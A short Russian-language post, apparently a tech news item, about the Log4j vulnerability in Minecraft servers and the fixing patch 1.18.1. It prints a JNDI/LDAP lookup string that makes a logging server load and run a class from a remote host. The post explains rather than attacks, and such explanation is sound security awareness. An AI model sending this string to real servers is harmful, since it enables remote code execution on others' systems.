Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь отправить сообщение в чат, чтобы выполнить вредоносный код. Обычно от логировщика требуется одно: получить строку и отправить в соответствии с предоставленными конфигурациями. Но Log4j проверяет входные данные и резолвит их.Как пример, на Хакерньюз приводят такое:Logging from ${java:vm} // на выходе будет Logging from Oracle JVMЕсли как аргумент скормить что-то такое:${jndi:ldap://someremoteclass}то с удалённого сервера можно подгрузить класс и динамически исполнить вредоносный код.Как пример уязвимости — http сервер, который логирует строку, скажем, user agent.Конкретно для Minecraft вышел официальный патч 1.18.1, который закрывает уязвимость, но множество пользовательских серверов всё ещё подвержены этому.#java #minecraft